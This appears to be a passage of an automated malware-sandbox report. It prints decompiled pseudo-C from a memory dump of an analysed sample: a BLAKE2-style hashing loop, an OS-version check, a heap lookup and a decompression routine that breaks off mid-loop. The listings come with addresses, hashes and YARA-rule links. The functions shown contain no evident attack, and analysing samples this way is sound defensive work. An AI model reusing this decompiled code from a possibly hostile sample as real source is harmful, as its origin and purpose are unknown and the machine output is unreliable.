				 *(_t437 + 0x20) =  *(_t437 + 0x50);
				 *((intOrPtr*)(_t437 + 0x10)) = 0;
				 *((intOrPtr*)(_t437 + 0x48)) = 0;
				_t427 =  *(_t437 + 0x44);
				 *(_t437 + 0x14) =  *(_t437 + 0x4c);
				_t240 =  *((intOrPtr*)(_t437 + 0x10));
				 *(_t437 + 0x24) = 0xa54ff53a;
				 *(_t437 + 0x40) = _t334;
				 *(_t437 + 0x34) = _t348;
				do {
					_t37 = _t240 + 0x8623b0; // 0x3020100
					_t350 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t37 & 0x000000ff) * 4)) + _t348;
					 *(_t437 + 0x14) = _t350;
					_t351 = _t350 ^ _t418;
					asm("rol ecx, 0x10");
					_t245 =  *(_t437 + 0x28) + _t351;
					_t420 =  *(_t437 + 0x34) ^ _t245;
					 *(_t437 + 0x28) = _t245;
					_t246 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror esi, 0xc");
					 *(_t437 + 0x34) = _t420;
					_t48 = _t246 + 0x8623b1; // 0x4030201
					_t422 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t48 & 0x000000ff) * 4)) + _t420;
					 *(_t437 + 0x14) = _t422;
					_t423 = _t422 ^ _t351;
					asm("ror esi, 0x8");
					_t353 =  *(_t437 + 0x28) + _t423;
					 *(_t437 + 0x28) = _t353;
					asm("ror eax, 0x7");
					 *(_t437 + 0x34) =  *(_t437 + 0x34) ^ _t353;
					_t60 =  *((intOrPtr*)(_t437 + 0x10)) + 0x8623b2; // 0x5040302
					_t355 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t60 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x20) = _t355;
					_t356 = _t355 ^ _t407;
					asm("rol ecx, 0x10");
					_t257 =  *(_t437 + 0x30) + _t356;
					_t409 =  *(_t437 + 0x1c) ^ _t257;
					 *(_t437 + 0x30) = _t257;
					_t258 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edi, 0xc");
					 *(_t437 + 0x1c) = _t409;
					_t71 = _t258 + 0x8623b3; // 0x6050403
					_t411 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t71 & 0x000000ff) * 4)) + _t409;
					 *(_t437 + 0x20) = _t411;
					_t412 = _t411 ^ _t356;
					asm("ror edi, 0x8");
					_t358 =  *(_t437 + 0x30) + _t412;
					 *(_t437 + 0x30) = _t358;
					asm("ror eax, 0x7");
					 *(_t437 + 0x1c) =  *(_t437 + 0x1c) ^ _t358;
					_t82 =  *((intOrPtr*)(_t437 + 0x10)) + 0x8623b4; // 0x7060504
					_t336 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t82 & 0x000000ff) * 4)) + _t334;
					_t360 = _t336 ^ _t379;
					asm("rol ecx, 0x10");
					_t269 =  *(_t437 + 0x18) + _t360;
					_t381 =  *(_t437 + 0x40) ^ _t269;
					 *(_t437 + 0x18) = _t269;
					_t270 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t91 = _t270 + 0x8623b5; // 0x8070605
					_t337 = _t336 +  *((intOrPtr*)(_t437 + 0x8c + ( *_t91 & 0x000000ff) * 4)) + _t381;
					 *(_t437 + 0x38) = _t337;
					_t338 = _t337 ^ _t360;
					asm("ror ebx, 0x8");
					_t275 =  *(_t437 + 0x18) + _t338;
					 *(_t437 + 0x18) = _t275;
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t381 ^ _t275;
					_t383 =  *((intOrPtr*)(_t437 + 0x10));
					_t101 = _t383 + 0x8623b6; // 0x9080706
					_t362 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t101 & 0x000000ff) * 4)) +  *(_t437 + 0x3c);
					 *(_t437 + 0x2c) = _t362;
					_t363 = _t362 ^ _t427;
					asm("rol ecx, 0x10");
					_t280 =  *(_t437 + 0x24) + _t363;
					_t429 =  *(_t437 + 0x3c) ^ _t280;
					 *(_t437 + 0x24) = _t280;
					_t110 = _t383 + 0x8623b7; // 0xa090807
					asm("ror ebp, 0xc");
					_t385 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t110 & 0x000000ff) * 4)) + _t429;
					 *(_t437 + 0x2c) = _t385;
					_t386 = _t385 ^ _t363;
					asm("ror edx, 0x8");
					_t285 =  *(_t437 + 0x24) + _t386;
					 *(_t437 + 0x24) = _t285;
					asm("ror ebp, 0x7");
					 *(_t437 + 0x3c) = _t429 ^ _t285;
					_t431 =  *((intOrPtr*)(_t437 + 0x10));
					_t121 = _t431 + 0x8623b8; // 0xb0a0908
					_t365 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t121 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x14) = _t365;
					_t366 = _t365 ^ _t386;
					asm("rol ecx, 0x10");
					_t290 =  *(_t437 + 0x18) + _t366;
					_t388 =  *(_t437 + 0x1c) ^ _t290;
					 *(_t437 + 0x18) = _t290;
					_t130 = _t431 + 0x8623b9; // 0xc0b0a09
					asm("ror edx, 0xc");
					_t433 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t130 & 0x000000ff) * 4)) + _t388;
					 *(_t437 + 0x14) = _t433;
					 *(_t437 + 0x4c) = _t433;
					_t427 = _t433 ^ _t366;
					asm("ror ebp, 0x8");
					_t295 =  *(_t437 + 0x18) + _t427;
					_t389 = _t388 ^ _t295;
					 *(_t437 + 0x18) = _t295;
					 *(_t437 + 0x74) = _t295;
					_t296 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x1c) = _t389;
					 *(_t437 + 0x60) = _t389;
					_t144 = _t296 + 0x8623ba; // 0xd0c0b0a
					_t390 =  *(_t437 + 0x40);
					_t368 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t144 & 0x000000ff) * 4)) + _t390;
					 *(_t437 + 0x20) = _t368;
					_t369 = _t368 ^ _t423;
					asm("rol ecx, 0x10");
					_t301 =  *(_t437 + 0x24) + _t369;
					_t391 = _t390 ^ _t301;
					 *(_t437 + 0x24) = _t301;
					_t302 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t154 = _t302 + 0x8623bb; // 0xe0d0c0b
					_t425 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t154 & 0x000000ff) * 4)) + _t391;
					 *(_t437 + 0x20) = _t425;
					 *(_t437 + 0x50) = _t425;
					_t418 = _t425 ^ _t369;
					asm("ror esi, 0x8");
					_t307 =  *(_t437 + 0x24) + _t418;
					_t392 = _t391 ^ _t307;
					 *(_t437 + 0x24) = _t307;
					 *(_t437 + 0x78) = _t307;
					_t308 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t392;
					 *(_t437 + 0x64) = _t392;
					_t167 = _t308 + 0x8623bc; // 0xf0e0d0c
					_t393 =  *(_t437 + 0x3c);
					_t371 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t167 & 0x000000ff) * 4)) + _t393;
					 *(_t437 + 0x38) = _t371;
					_t372 = _t371 ^ _t412;
					asm("rol ecx, 0x10");
					_t313 =  *(_t437 + 0x28) + _t372;
					_t394 = _t393 ^ _t313;
					 *(_t437 + 0x28) = _t313;
					_t314 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t177 = _t314 + 0x8623bd; // 0xe0f0e0d
					_t414 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t177 & 0x000000ff) * 4)) + _t394;
					 *(_t437 + 0x38) = _t414;
					 *(_t437 + 0x54) = _t414;
					_t407 = _t414 ^ _t372;
					asm("ror edi, 0x8");
					_t319 =  *(_t437 + 0x28) + _t407;
					_t395 = _t394 ^ _t319;
					 *(_t437 + 0x28) = _t319;
					asm("ror edx, 0x7");
					 *(_t437 + 0x3c) = _t395;
					 *(_t437 + 0x68) = _t395;
					_t396 =  *((intOrPtr*)(_t437 + 0x10));
					 *(_t437 + 0x6c) = _t319;
					_t190 = _t396 + 0x8623be; // 0xa0e0f0e
					_t374 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t190 & 0x000000ff) * 4)) +  *(_t437 + 0x34);
					 *(_t437 + 0x2c) = _t374;
					_t375 = _t374 ^ _t338;
					asm("rol ecx, 0x10");
					_t324 =  *(_t437 + 0x30) + _t375;
					_t340 =  *(_t437 + 0x34) ^ _t324;
					 *(_t437 + 0x30) = _t324;
					_t199 = _t396 + 0x8623bf; // 0x40a0e0f
					asm("ror ebx, 0xc");
					_t398 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t199 & 0x000000ff) * 4)) + _t340;
					 *(_t437 + 0x2c) = _t398;
					 *(_t437 + 0x58) = _t398;
					_t379 = _t398 ^ _t375;
					asm("ror edx, 0x8");
					_t329 =  *(_t437 + 0x30) + _t379;
					_t341 = _t340 ^ _t329;
					 *(_t437 + 0x30) = _t329;
					 *(_t437 + 0x70) = _t329;
					asm("ror ebx, 0x7");
					_t240 =  *((intOrPtr*)(_t437 + 0x10)) + 0x10;
					 *(_t437 + 0x34) = _t341;
					_t348 =  *(_t437 + 0x34);
					 *(_t437 + 0x5c) = _t341;
					_t334 =  *(_t437 + 0x40);
					 *((intOrPtr*)(_t437 + 0x10)) = _t240;
				} while (_t240 <= 0x90);
				 *(_t437 + 0x84) = _t379;
				_t399 =  *((intOrPtr*)(_t437 + 0xd0));
				 *(_t437 + 0x88) = _t427;
				_t434 =  *((intOrPtr*)(_t437 + 0x48));
				 *(_t437 + 0x7c) = _t418;
				 *(_t437 + 0x80) = _t407;
				do {
					_t376 =  *((intOrPtr*)(_t399 + 0xf4));
					_t333 =  *(_t437 + _t434 + 0x6c) ^  *(_t376 + _t434) ^  *(_t437 + _t434 + 0x4c);
					 *(_t376 + _t434) = _t333;
					_t434 = _t434 + 4;
				} while (_t434 < 0x20);
				return _t333;
			}

0x00833fc3
0x00833fdd
0x00833fe5
0x00833fed
0x00833fed
0x00833ff9
0x00833ffc
0x00833ffc
0x00834008
0x0083400e
0x00834014
0x0083401a
0x0083401e
0x00834027
0x00834030
0x00834036
0x0083403f
0x00834049
0x00834051
0x00834059
0x00834061
0x00834069
0x00834071
0x00834075
0x00834079
0x0083407d
0x00834081
0x00834085
0x0083408d
0x00834091
0x00834095
0x00834095
0x008340a9
0x008340af
0x008340b3
0x008340b9
0x008340bc
0x008340be
0x008340c0
0x008340c4
0x008340c8
0x008340cb
0x008340cf
0x008340e3
0x008340e9
0x008340ed
0x008340f3
0x008340f6
0x008340fa
0x008340fe
0x00834101
0x0083410d
0x0083411f
0x00834125
0x00834129
0x0083412f
0x00834132
0x00834134
0x00834136
0x0083413a
0x0083413e
0x00834141
0x00834145
0x00834159
0x0083415f
0x00834163
0x00834169
0x0083416c
0x00834170
0x00834174
0x00834177
0x0083417f
0x00834193
0x0083419b
0x008341a1
0x008341a4
0x008341a6
0x008341a8
0x008341ac
0x008341b0
0x008341b3
0x008341c3
0x008341c9
0x008341cd
0x008341d3
0x008341d6
0x008341da
0x008341de
0x008341e1
0x008341e5
0x008341e9
0x008341fb
0x00834201
0x00834205
0x0083420b
0x0083420e
0x00834210
0x00834212
0x00834216
0x00834221
0x0083422d
0x00834233
0x00834237
0x0083423d
0x00834240
0x00834244
0x00834248
0x0083424b
0x0083424f
0x00834253
0x00834265
0x0083426b
0x0083426f
0x00834275
0x00834278
0x0083427a
0x0083427c
0x00834280
0x0083428b
0x00834297
0x0083429d
0x008342a1
0x008342a5
0x008342ab
0x008342ae
0x008342b0
0x008342b2
0x008342b6
0x008342ba
0x008342be
0x008342c1
0x008342c5
0x008342c9
0x008342d0
0x008342dd
0x008342df
0x008342e3
0x008342ed
0x008342f0
0x008342f2
0x008342f4
0x008342f8
0x008342fc
0x008342ff
0x0083430f
0x00834315
0x00834319
0x0083431d
0x00834323
0x00834326
0x00834328
0x0083432a
0x0083432e
0x00834332
0x00834336
0x00834339
0x0083433d
0x00834341
0x00834348
0x00834355
0x0083435b
0x0083435f
0x00834365
0x00834368
0x0083436a
0x0083436c
0x00834370
0x00834374
0x00834377
0x00834387
0x0083438d
0x00834391
0x00834395
0x0083439b
0x0083439e
0x008343a0
0x008343a2
0x008343a6
0x008343a9
0x008343ad
0x008343b1
0x008343b5
0x008343b9
0x008343cb
0x008343d1
0x008343d5
0x008343db
0x008343de
0x008343e0
0x008343e2
0x008343e6
0x008343f1
0x008343fd
0x008343ff
0x00834403
0x00834407
0x00834409
0x00834410
0x00834412
0x00834414
0x00834418
0x00834420
0x00834423
0x00834426
0x0083442a
0x0083442e
0x00834432
0x00834436
0x0083443a
0x00834445
0x0083444c
0x00834453
0x0083445a
0x0083445e
0x00834462
0x00834469
0x00834469
0x00834476
0x0083447a
0x0083447d
0x00834480
0x0083448f

Strings

gj, xrefs: 00834000

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 0361acc4a6c77935b9d53b3e6e1e387fe0b6924fc07586457914975cb0960408
Instruction ID: 3bea9977f3d37aa1eb89a79b07d04f39206784b59ec25111ff5814de9275833b
Opcode Fuzzy Hash: 0361acc4a6c77935b9d53b3e6e1e387fe0b6924fc07586457914975cb0960408
Instruction Fuzzy Hash: 0FF1D3B2A083418FC748CF29D880A1AFBE2BFC8208F15896EF598D7711D734E9458F56

Uniqueness

Uniqueness Score: -1.00%

Function 0083AA39, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0083AA39() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0x86d020; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0x8700f0; // 0xa
					_t13 =  *0x8700f4; // 0x0
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0x86d020 = _t12;
					 *0x8700f0 = _t6;
					 *0x8700f4 = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}

0x0083aa3c
0x0083aa4b
0x0083aa89
0x0083aa8e
0x0083aa4d
0x0083aa53
0x0083aa5e
0x0083aa64
0x0083aa6a
0x0083aa70
0x0083aa76
0x0083aa7c
0x0083aa81
0x0083aa81
0x0083aa97
0x00000000
0x0083aa99
0x00000000
0x0083aa9c

APIs

GetVersionExW.KERNEL32(?), ref: 0083AA5E

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 05760feeca3d48a4c53626b480103b90f8cb2c69fff688a2aa260cef2d3c1c59
Instruction ID: fdad9c7023fa35fcb0b9becd9be836bd67993f1ba8a2ff4fd1a51b6251f628f7
Opcode Fuzzy Hash: 05760feeca3d48a4c53626b480103b90f8cb2c69fff688a2aa260cef2d3c1c59
Instruction Fuzzy Hash: EFF06DB1D04619CBCB18CB18ED46AE473B5F798310F1002A9DA1983390E3B0A980DE92

Uniqueness

Uniqueness Score: -1.00%

Function 0085ACFC, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0085ACFC() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x890874 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x0085acfc
0x0085ad04
0x0085ad0c

APIs

GetProcessHeap.KERNEL32 ref: 0085ACFC

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 3441536dea5849b6d6d044f4c293f2972cfa6c599184776cd02bf7e2195c87d5
Instruction ID: 5312bd7f18844c674ab05da170d94813cef422e5d82de627a5e9825f8005d933
Opcode Fuzzy Hash: 3441536dea5849b6d6d044f4c293f2972cfa6c599184776cd02bf7e2195c87d5
Instruction Fuzzy Hash: 00A00270B06601CF97409F35AF0930D3AE9BE46AD170EA1BAE609D6175EB74D4609F41

Uniqueness

Uniqueness Score: -1.00%

Function 00845911, Relevance: .8, Instructions: 800
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00845911(intOrPtr __esi) {
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				void* _t328;
				intOrPtr _t333;
				signed int _t347;
				char _t356;
				unsigned int _t359;
				void* _t366;
				intOrPtr _t371;
				signed int _t381;
				char _t390;
				unsigned int _t391;
				void* _t399;
				intOrPtr _t400;
				signed int _t403;
				char _t412;
				signed int _t414;
				intOrPtr _t415;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed short _t424;
				signed int _t425;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t433;
				signed int _t434;
				signed short _t435;
				unsigned int _t439;
				unsigned int _t444;
				signed int _t458;
				signed int _t460;
				signed int _t461;
				signed int _t464;
				signed int _t466;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				intOrPtr* _t474;
				signed int _t478;
				signed int _t479;
				intOrPtr _t483;
				unsigned int _t486;
				void* _t488;
				signed int _t491;
				signed int* _t493;
				unsigned int _t496;
				void* _t498;
				signed int _t501;
				signed int _t503;
				signed int _t511;
				void* _t514;
				signed int _t517;
				signed int _t519;
				signed int _t522;
				void* _t525;
				signed int _t528;
				signed int _t529;
				intOrPtr* _t531;
				void* _t532;
				signed int _t535;
				signed int _t537;
				signed int _t539;
				unsigned int _t546;
				void* _t548;
				signed int _t551;
				unsigned int _t555;
				void* _t557;
				signed int _t560;
				intOrPtr* _t562;
				void* _t563;
				signed int _t566;
				void* _t569;
				signed int _t572;
				intOrPtr* _t575;
				void* _t576;
				signed int _t579;
				void* _t582;
				signed int _t585;
				signed int _t586;
				intOrPtr* _t591;
				void* _t592;
				signed int _t595;
				signed int* _t598;
				unsigned int _t600;
				signed int _t603;
				unsigned int _t605;
				signed int _t608;
				void* _t611;
				signed int _t613;
				signed int _t614;
				void* _t615;
				unsigned int _t617;
				unsigned int _t621;
				signed int _t624;
				signed int _t625;
				signed int _t626;
				signed int _t627;
				signed int _t628;
				signed int _t629;
				unsigned int _t632;
				signed int _t634;
				intOrPtr* _t637;
				intOrPtr _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				char* _t646;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				char* _t652;
				intOrPtr* _t656;
				signed int _t657;
				void* _t658;
				void* _t661;

				L0:
				while(1) {
					L0:
					_t638 = __esi;
					_t598 = __esi + 0x7c;
					while(1) {
						L1:
						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
							goto L12;
						} else {
							_t637 = _t638 + 0x8c;
						}
						while(1) {
							L3:
							_t661 =  *_t643 -  *((intOrPtr*)(_t638 + 0x94)) - 1 +  *_t637;
							if(_t661 <= 0 && (_t661 != 0 ||  *(_t638 + 8) <  *((intOrPtr*)(_t638 + 0x90)))) {
								break;
							}
							L6:
							if( *((char*)(_t638 + 0x9c)) != 0) {
								L99:
								_t415 = E0084484D(_t638);
								L100:
								return _t415;
							}
							L7:
							_push(_t637);
							_push(_t643);
							_t415 = E00843446(_t638);
							if(_t415 == 0) {
								goto L100;
							}
							L8:
							_push(_t638 + 0xa0);
							_push(_t637);
							_push(_t643);
							_t415 = E008439F2(_t638);
							if(_t415 != 0) {
								continue;
							} else {
								goto L100;
							}
						}
						L10:
						_t458 = E00844495(_t638);
						__eflags = _t458;
						if(_t458 == 0) {
							goto L99;
						} else {
							_t598 = _t638 + 0x7c;
						}
						L12:
						_t483 =  *((intOrPtr*)(_t638 + 0x4b3c));
						__eflags = (_t483 -  *_t598 &  *(_t638 + 0xe6dc)) - 0x1004;
						if((_t483 -  *_t598 &  *(_t638 + 0xe6dc)) >= 0x1004) {
							L18:
							_t314 = E0083A591(_t643);
							_t315 =  *(_t638 + 0x124);
							_t600 = _t314 & 0x0000fffe;
							__eflags = _t600 -  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4));
							if(_t600 >=  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4))) {
								L20:
								_t627 = 0xf;
								_t316 = _t315 + 1;
								__eflags = _t316 - _t627;
								if(_t316 >= _t627) {
									L26:
									_t486 =  *(_t643 + 4) + _t627;
									 *(_t643 + 4) = _t486 & 0x00000007;
									_t318 = _t486 >> 3;
									 *_t643 =  *_t643 + _t318;
									_t488 = 0x10;
									_t491 =  *((intOrPtr*)(_t638 + 0xe4 + _t627 * 4)) + (_t600 -  *((intOrPtr*)(_t638 + 0xa0 + _t627 * 4)) >> _t488 - _t627);
									__eflags = _t491 -  *((intOrPtr*)(_t638 + 0xa0));
									asm("sbb eax, eax");
									_t319 = _t318 & _t491;
									__eflags = _t319;
									_t460 =  *(_t638 + 0xd28 + _t319 * 2) & 0x0000ffff;
									goto L27;
								} else {
									_t591 = _t638 + (_t316 + 0x29) * 4;
									while(1) {
										L22:
										__eflags = _t600 -  *_t591;
										if(_t600 <  *_t591) {
											_t627 = _t316;
											goto L26;
										}
										L23:
										_t316 = _t316 + 1;
										_t591 = _t591 + 4;
										__eflags = _t316 - 0xf;
										if(_t316 < 0xf) {
											continue;
										} else {
											goto L26;
										}
									}
									goto L26;
								}
							} else {
								_t592 = 0x10;
								_t626 = _t600 >> _t592 - _t315;
								_t595 = ( *(_t626 + _t638 + 0x128) & 0x000000ff) +  *(_t643 + 4);
								 *_t643 =  *_t643 + (_t595 >> 3);
								 *(_t643 + 4) = _t595 & 0x00000007;
								_t460 =  *(_t638 + 0x528 + _t626 * 2) & 0x0000ffff;
								L27:
								__eflags = _t460 - 0x100;
								if(_t460 >= 0x100) {
									L31:
									__eflags = _t460 - 0x106;
									if(_t460 < 0x106) {
										L96:
										__eflags = _t460 - 0x100;
										if(_t460 != 0x100) {
											L102:
											__eflags = _t460 - 0x101;
											if(_t460 != 0x101) {
												L129:
												_t461 = _t460 + 0xfffffefe;
												__eflags = _t461;
												_t493 = _t638 + (_t461 + 0x18) * 4;
												_t603 =  *_t493;
												 *(_t658 + 0x30) = _t603;
												if(_t461 == 0) {
													L131:
													 *(_t638 + 0x60) = _t603;
													_t320 = E0083A591(_t643);
													_t321 =  *(_t638 + 0x2de8);
													_t605 = _t320 & 0x0000fffe;
													__eflags = _t605 -  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4));
													if(_t605 >=  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4))) {
														L133:
														_t628 = 0xf;
														_t322 = _t321 + 1;
														__eflags = _t322 - _t628;
														if(_t322 >= _t628) {
															L139:
															_t496 =  *(_t643 + 4) + _t628;
															 *(_t643 + 4) = _t496 & 0x00000007;
															_t324 = _t496 >> 3;
															 *_t643 =  *_t643 + _t324;
															_t498 = 0x10;
															_t501 =  *((intOrPtr*)(_t638 + 0x2da8 + _t628 * 4)) + (_t605 -  *((intOrPtr*)(_t638 + 0x2d64 + _t628 * 4)) >> _t498 - _t628);
															__eflags = _t501 -  *((intOrPtr*)(_t638 + 0x2d64));
															asm("sbb eax, eax");
															_t325 = _t324 & _t501;
															__eflags = _t325;
															_t326 =  *(_t638 + 0x39ec + _t325 * 2) & 0x0000ffff;
															L140:
															_t629 = _t326 & 0x0000ffff;
															__eflags = _t629 - 8;
															if(_t629 >= 8) {
																_t464 = (_t629 >> 2) - 1;
																_t629 = (_t629 & 0x00000003 | 0x00000004) << _t464;
																__eflags = _t629;
															} else {
																_t464 = 0;
															}
															_t632 = _t629 + 2;
															__eflags = _t464;
															if(_t464 != 0) {
																_t391 = E0083A591(_t643);
																_t525 = 0x10;
																_t632 = _t632 + (_t391 >> _t525 - _t464);
																_t528 =  *(_t643 + 4) + _t464;
																 *_t643 =  *_t643 + (_t528 >> 3);
																_t529 = _t528 & 0x00000007;
																__eflags = _t529;
																 *(_t643 + 4) = _t529;
															}
															__eflags =  *((char*)(_t638 + 0x4c44));
															_t608 =  *(_t658 + 0x30);
															 *(_t638 + 0x74) = _t632;
															if( *((char*)(_t638 + 0x4c44)) == 0) {
																L147:
																_t503 =  *(_t638 + 0x7c);
																_t466 = _t503 - _t608;
																_t328 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																__eflags = _t466 - _t328;
																if(_t466 >= _t328) {
																	L158:
																	__eflags = _t632;
																	if(_t632 == 0) {
																		while(1) {
																			L0:
																			_t638 = __esi;
																			_t598 = __esi + 0x7c;
																			goto L1;
																		}
																	}
																	L159:
																	_t644 =  *(_t638 + 0xe6dc);
																	do {
																		L160:
																		_t645 = _t644 & _t466;
																		_t466 = _t466 + 1;
																		 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t645));
																		_t598 = _t638 + 0x7c;
																		_t644 =  *(_t638 + 0xe6dc);
																		 *_t598 =  *_t598 + 0x00000001 & _t644;
																		_t632 = _t632 - 1;
																		__eflags = _t632;
																	} while (_t632 != 0);
																	goto L161;
																}
																L148:
																__eflags = _t503 - _t328;
																if(_t503 >= _t328) {
																	goto L158;
																}
																L149:
																_t333 =  *((intOrPtr*)(_t638 + 0x4b40));
																_t468 = _t466 + _t333;
																_t646 = _t333 + _t503;
																 *(_t638 + 0x7c) = _t503 + _t632;
																__eflags = _t608 - _t632;
																if(_t608 >= _t632) {
																	L154:
																	__eflags = _t632 - 8;
																	if(_t632 < 8) {
																		goto L117;
																	}
																	L155:
																	_t347 = _t632 >> 3;
																	__eflags = _t347;
																	 *(_t658 + 0x30) = _t347;
																	_t639 = _t347;
																	do {
																		L156:
																		E0084EA80(_t646, _t468, 8);
																		_t658 = _t658 + 0xc;
																		_t468 = _t468 + 8;
																		_t646 = _t646 + 8;
																		_t632 = _t632 - 8;
																		_t639 = _t639 - 1;
																		__eflags = _t639;
																	} while (_t639 != 0);
																	goto L116;
																}
																L150:
																_t611 = 8;
																__eflags = _t632 - _t611;
																if(_t632 < _t611) {
																	goto L117;
																}
																L151:
																_t511 = _t632 >> 3;
																__eflags = _t511;
																do {
																	L152:
																	_t632 = _t632 - _t611;
																	 *_t646 =  *_t468;
																	 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																	 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																	 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																	 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																	 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																	 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																	_t356 =  *((intOrPtr*)(_t468 + 7));
																	_t468 = _t468 + _t611;
																	 *((char*)(_t646 + 7)) = _t356;
																	_t646 = _t646 + _t611;
																	_t511 = _t511 - 1;
																	__eflags = _t511;
																} while (_t511 != 0);
																goto L117;
															} else {
																L146:
																_push( *(_t638 + 0xe6dc));
																_push(_t638 + 0x7c);
																_push(_t608);
																L71:
																_push(_t632);
																E00842161();
																goto L0;
																do {
																	while(1) {
																		L0:
																		_t638 = __esi;
																		_t598 = __esi + 0x7c;
																		do {
																			while(1) {
																				L1:
